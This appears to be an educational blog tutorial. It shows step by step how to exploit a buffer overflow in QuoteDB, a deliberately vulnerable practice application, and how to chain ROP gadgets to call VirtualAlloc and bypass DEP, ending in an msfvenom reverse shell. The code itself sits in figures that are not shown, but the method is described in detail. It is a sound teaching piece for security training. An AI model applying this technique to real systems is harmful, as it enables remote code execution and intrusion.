A step-by-step introduction to the use of ROP gadgets to bypass DEP

Summary

DEP (Data Execution Prevention) is a memory protection feature that allows the system to mark memory pages as non-executable. ROP (Return-oriented programming) is an exploit technique that allows an attacker to execute shellcode with protections such as DEP enabled. In this blog post, we will present the reverse engineering process of an application in order to discover a buffer overflow vulnerability and develop an ROP gadgets chain that is used to bypass DEP. We’re planning to write another article that presents a method to bypass ASLR + DEP. We would love to hear your feedback on Twitter.

Exploit development

We will use the following tools in the exploit development process: QuoteDB, TCPView, IDA Freeware, WinDbg, and rp++.

QuoteDB is an application that is vulnerable by design and was created to practice reverse engineering and exploit development on it. As we can see in figure 1, the application is listening for network connections on port 3700:

Figure 1

We’ve used TCPView to confirm that the program is indeed listening on port 3700 (see figure 2).

Figure 2

Now we need to reverse engineer the application and see how it handles a network connection. The accept function is utilized to permit an incoming connection on the specified port, and then the process creates a new thread that runs the “handle_connection” routine, as shown below:

Figure 3

The recv function is used to receive data from the connected socket:

Figure 4

We’ve developed a basic Python script that creates a TCP socket and sends 1000 “A” characters to the remote server on port 3700:

Figure 5

We’ve attached WinDbg to the QuoteDB.exe process and listed the loaded modules, as shown in figure 6.

Figure 6

We can use the “bp” command to place a breakpoint after the recv function call and the “bl” command to confirm that the breakpoint was successfully set:

Figure 7

After the recv function returns, the EAX register contains the number of bytes received in hexadecimal:

Figure 8

The first 4 bytes from our buffer represent an Opcode that is moved into the EAX register and then printed in the command line:

Figure 9

Figure 10 presents the printf call in WinDbg, and we can observe that the third argument (= Opcode) consists of 4 “A” characters:

Figure 10

The process displays the source IP address, the source port, the buffer’s length, and the Opcode in decimal:

Figure 11

The application subtracts 0x384 (900 in decimal) from the Opcode and compares the result with 4 (figure 12). This is a switch with 5 cases that was also displayed in figure 9.

Figure 12

The EAX register is greater than 4, and the execution flow is redirected to the default case, which calls the “log_bad_request” function:

Figure 13

The above function contains the buffer overflow vulnerability. As we can see in figure 14, the executable allocates 0x818 (2072) bytes on the stack, initializes a buffer with zeros, and copies our payload to this buffer without checking the boundary:

Figure 14

The overflow occurs because the number of characters to copy (0x4000) is greater than the size of the buffer, and it could overwrite the return address:

Figure 15

We’ve chosen to send 3000 “A” characters in order to exploit the vulnerability. As we can see below, the return address was overwritten on the stack, and the program crashed because of it:

Figure 16
Figure 17

We’ve used the “msf-pattern_create” command to generate a unique pattern that will give us the offset (see figure 18).

Figure 18

The application crashes at a different address that is utilized to determine the exact offset using the “msf-pattern_offset” command:

Figure 19
Figure 20

We’ve modified the proof of concept to include the above offset. After crashing at the correct address, the ESP register points to the last part of the buffer that is under our control:

Figure 21
Figure 22

We’ve used the narly WinDbg extension to display the loaded modules and their memory protections. Figure 23 shows that the executable was compiled with ASLR and DEP protections enabled, however, we’ve disabled ASLR for this blog post. We intend to write another article that presents a method to bypass ASLR + DEP.

Figure 23

Windows Defender Exploit Guard can be used to enable/disable ASLR. We need to go to the “Exploit protection settings”, select the “Program settings” tab, click on “Add program to customize”, and select the “Choose exact file path” option:

Figure 24
Figure 25

We’ve wanted to find out which characters are considered “bad” for our exploit by sending all bytes from “\x00” t0 “\xFF” and determining how they’re written on the stack:

Figure 26

According to figure 27, there are no bad characters, however, we will raise the stakes and consider “\x00” a badchar because usually it is. Because of this, the exploit development process is a bit more complex, but it might be adapted to other applications more easily.

Figure 27

We’ve used the rp++ tool to extract the ROP gadgets from the “SysWOW64\kernel32.dll” module. Because we consider ASLR to be disabled, we could choose any DLL that provides the necessary ROP gadgets, however, we’ll see in a future blog post that the application leaks an address in a specific DLL. We’ve set the maximum number of instructions in a gadget to 5:

Figure 28
Figure 29

Because of the DEP protection, the stack is no longer executable, and we need to find a way to execute our shellcode. We can use APIs such as VirtualAlloc, VirtualProtect, and WriteProcessMemory to bypass DEP. The VirtualAlloc function is used to reserve, commit, or change the state of pages in the address space of the process. The function has 4 parameters:

  • lpAddress
  • dwSize
  • flAllocationType
  • flProtect

Our intention is to set the flAllocationType parameter to 0x1000 (MEM_COMMIT) and flProtect to 0x40 (PAGE_EXECUTE_READWRITE). We need to create the following skeleton on the stack:

  • VirtualAlloc address
  • Return address (Shellcode address)
  • lpAddress (Shellcode address)
  • dwSize (0x1)
  • flAllocationType (0x1000)
  • flProtect (0x40)

We’ve assigned a specific value to every element, which needs to be modified with the correct value at runtime (see figure 30).

Figure 30

As we can see in figure 31, our skeleton can be found at a fixed offset from the ESP register:

Figure 31

The start address of the kernel32.dll module can be identified using WinDbg (it might be different on your machine). All ROP gadgets’ address must be computed using this value and not the loading address present in the “rop.txt” file:

Figure 32

Firstly, we need to find a ROP gadget that preserves the value of the ESP register. We’ve identified one that copies the ESP register into the ESI register:

Figure 33

We’ve modified our Python script to include the kernel32 address and the above ROP gadget offset, as displayed below:

Figure 34

We’ve successfully redirected the execution flow to our first ROP gadget and we can chain together other ROP gadgets because ESP still points to our buffer:

Figure 35
Figure 36

Now we need to find a way to subtract 0x1C from the ESI register. However, due to the lack of ROP gadgets involving computation using the ESI register, we found a ROP gadget that copies the ESI register into EAX. The only problem is that ESI is also modified by the “POP ESI” instruction, however, it doesn’t impact our exploit:

Figure 37
Figure 38

Another register that is found in many ROP gadgets is ECX. We’ve identified a ROP gadget that pops a value from the stack into the ECX register and another one that adds the EAX and ECX registers together. Adding a negative value is equivalent to subtracting the same positive value:

Figure 39
Figure 40

The EAX points to the VirtualAlloc skeleton by adding a value of -0x1C (= ECX) to the previous EAX value:

Figure 41

Because EAX will be useful in any computation, we need to find a way to preserve it before doing any other operations. We found a ROP gadget that copies the EAX register into ECX, which will be used to modify the values from the skeleton. The fact that EAX is also modified by this ROP gadget doesn’t impact our exploit:

Figure 42

Our modified proof of concept is displayed in figure 43. The “junk” values are useful for stack alignment and correspond to the “POP reg” and “retn4” instructions.

Figure 43

After running the Python script again, we can observe that the ECX register has the same value as the previous EAX register and points to the VirtualAlloc skeleton:

Figure 44

The IAT (Import Address Table) contains pointers to functions that are exported by other DLLs. For example, kernel32.dll has an entry in the IAT for VirtualAlloc, which remains constant even if the actual address of VirtualAlloc is changing:

Figure 45

We’ve used the “POP EAX” instruction to copy the VirtualAlloc IAT into the EAX register, which needs to be dereferenced in order to obtain the VirtualAlloc address, as shown below:

Figure 46
Figure 47

After updating our Python script and running it again, we’ve successfully obtained the VirtualAlloc address in EAX:

Figure 48

Because ECX still points to the VirtualAlloc skeleton, we need a ROP gadget that contains “MOV [ECX], EAX” in order to update the first skeleton value with the VirtualAlloc address:

Figure 49
Figure 50

We need to find a way to modify the ECX register to point to the next skeleton value. The “INC ECX” instruction is utilized to add 1 to the ECX register, and we’ve used 4 of those:

Figure 51
Figure 52

As we can see in figure 53, ECX points to the next element that has to be modified:

Figure 53

The second skeleton value corresponds to the shellcode address. The first ROP gadget copies the ECX register into EAX. Our idea was to place the shellcode after the ROP gadgets in our payload, which would represent a higher address than the current one. We’ve subtracted a negative offset (-0x210) from the EAX register, and now EAX points to a buffer that can be populated with our shellcode (see figure 57):

Figure 54
Figure 55
Figure 56
Figure 57

Using a previous ROP gadget, we’ve updated the second value from the skeleton, and now it looks like below:

Figure 58

The third skeleton value (lpAddress) should also be equal to the shellcode address. Similarly, we’ve subtracted a different offset (-0x20c) from the EAX register because EAX increased by 4. You may notice that the stack addresses are different between two executions, but the offsets remain the same:

Figure 59

The fourth skeleton value (dwSize) should be initialized with 1. Due to the fact that we considered “\x00” as a bad character, we couldn’t just place the required value on the stack because it contains NULL bytes. We’ve used the “NEG EAX” instruction to negate -1 = 0xFFFFFFFF and obtained the desired value:

Figure 60
Figure 61

The fifth skeleton value (flAllocationType) should be set to 0x1000. We need to find two hex numbers that have the sum of 0x1000 (after truncating the result), and we consider number1 = 0x88888888. Using simple math, we can determine that the second number must be 0x77778778, as shown below:

Figure 62

We’ve copied the two numbers into EAX and ESI using “POP reg” instructions and performed the addition operation using another ROP gadget, as displayed in figure 63.

Figure 63

Our almost-finished VirtualAlloc skeleton is shown below:

Figure 64

The last skeleton value (flProtect) should be initialized with 0x40. We’ve already provided the necessary steps to obtain the desired result:

Figure 65
Figure 66

Finally, we need to find a way to execute the VirtualAlloc function with the modified parameters. The ECX register that points to the last skeleton value is copied into the EAX register, which needs to be subtracted by 0x14 (6 elements in the skeleton) in order to point to the first value of the VirtualAlloc skeleton. The “xchg” instruction is utilized to exchange the contents of the EAX register and the ESP register, which results in executing the VirtualAlloc function:

Figure 67

The last part of the ROP gadgets chain is presented below:

Figure 68

After executing the VirtualAlloc API, we can see that the buffer is now executable:

Figure 69
Figure 70

We could determine that the distance between the shellcode address and the last ROP gadget is 0x9C bytes (see figure 71).

Figure 71

We’ve added 0x9C padding bytes and then a fake shellcode containing NOP instructions to confirm that the offset is correct:

Figure 72

We’ve generated a reverse shell using msfvenom and successfully executed our exploit. DEP was bypassed by chaining together multiple ROP gadgets that performed a VirtualAlloc call and made the memory page containing the shellcode as executable.

Figure 73
Figure 74